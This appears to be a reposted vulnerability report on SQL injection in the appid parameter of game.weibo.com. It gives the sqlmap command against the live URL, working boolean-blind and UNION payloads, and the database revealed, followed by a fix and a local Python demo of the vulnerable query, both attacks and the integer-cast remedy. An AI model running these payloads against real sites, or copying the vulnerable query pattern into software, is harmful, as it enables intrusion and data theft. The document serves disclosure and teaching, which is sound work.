SQL injection (UNION-capable) on a Sina Weibo sub-site
程序员文章站
2022-06-27 17:49:14
# Website
https://game.weibo.com
# Injection point: parameter appid
https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888
python sqlmap.py -u "https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

    Type: UNION query
    Title: MySQL UNION query (80) - 13 columns
    Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
available databases [1]:
[*] app_vgwebgame
Solution:
Force type conversion: appid is a numeric identifier, so cast it to an integer (and reject anything that is not a plain integer) before it is placed in the query. Both payloads above depend on the single quote closing the string literal, which a value that has been converted to an integer can never contain. Binding the value as a query parameter instead of concatenating it into the SQL text closes the same hole for parameters that are not numeric.
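The injection and the fix side by side, as an added example that is not part of the original report: a Python script against an in-memory SQLite database. The schema, table names (servers, users) and rows are constructed for the example; the real schema behind game.weibo.com is unknown, sqlmap only revealed the database name app_vgwebgame. The script shows the string-concatenated query that the sqlmap payloads exploit, the boolean-based blind probe and the UNION dump from the output above translated to SQLite syntax (two columns instead of thirteen, `--` in place of MySQL's `#` to swallow the trailing quote), and the forced-integer version that the solution describes.

```python
import re
import sqlite3


# Constructed in-memory database standing in for the game-server backend.
# Table and column names are invented for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE servers (appid INTEGER, server_name TEXT)")
    conn.executemany(
        "INSERT INTO servers VALUES (?, ?)",
        [(3031123572, "server-01"), (3031123572, "server-02"), (999, "other")],
    )
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-secret')")
    conn.commit()
    return conn


def get_servers_vulnerable(conn, appid):
    """The anti-pattern behind the finding: appid is interpolated into the SQL
    text inside single quotes, so a quote in the input ends the literal and
    whatever follows is parsed as SQL."""
    sql = "SELECT appid, server_name FROM servers WHERE appid = '%s'" % appid
    return conn.execute(sql).fetchall()


# Whitelist for the forced-integer fix: decimal digits only, bounded length.
APPID_RE = re.compile(r"[0-9]{1,20}")


def get_servers_fixed(conn, appid):
    """The page's fix (forced type conversion): appid is accepted only if it is
    a plain decimal string, converted to int, and then bound as a parameter
    rather than pasted into the SQL text."""
    if not isinstance(appid, str) or not APPID_RE.fullmatch(appid):
        raise ValueError("appid must be a decimal integer")
    appid_int = int(appid)
    sql = "SELECT appid, server_name FROM servers WHERE appid = ?"
    return conn.execute(sql, (appid_int,)).fetchall()


def boolean_probe(conn, condition):
    """Boolean-based blind technique from the sqlmap output: append a condition
    to the valid appid and observe whether the legitimate rows still come back
    (True) or vanish (False). Any SQL condition can be asked this way."""
    payload = "3031123572' AND (%s) AND '1'='1" % condition
    return len(get_servers_vulnerable(conn, payload)) > 0


def union_dump(conn):
    """UNION technique from the sqlmap output, in SQLite syntax: the column
    count must match the original SELECT (two here), and '--' comments out
    the trailing quote the way '#' does in MySQL."""
    payload = "3031123572' UNION ALL SELECT username, pwhash FROM users--"
    return get_servers_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("blind true :", boolean_probe(db, "5987=5987"))
    print("blind false:", boolean_probe(db, "5987=5988"))
    print("union rows :", union_dump(db))
    try:
        get_servers_fixed(db, "3031123572' UNION ALL SELECT username, pwhash FROM users--")
    except ValueError as err:
        print("fixed      : rejected,", err)
    print("fixed rows :", get_servers_fixed(db, "3031123572"))
```

The whitelist regex is deliberately stricter than a bare integer cast: a cast such as `(int)"3031123572' UNION ..."` in many languages silently yields 3031123572 and is safe against injection, but it also hides the attack attempt, whereas rejecting the value outright leaves an error that can be logged and alerted on.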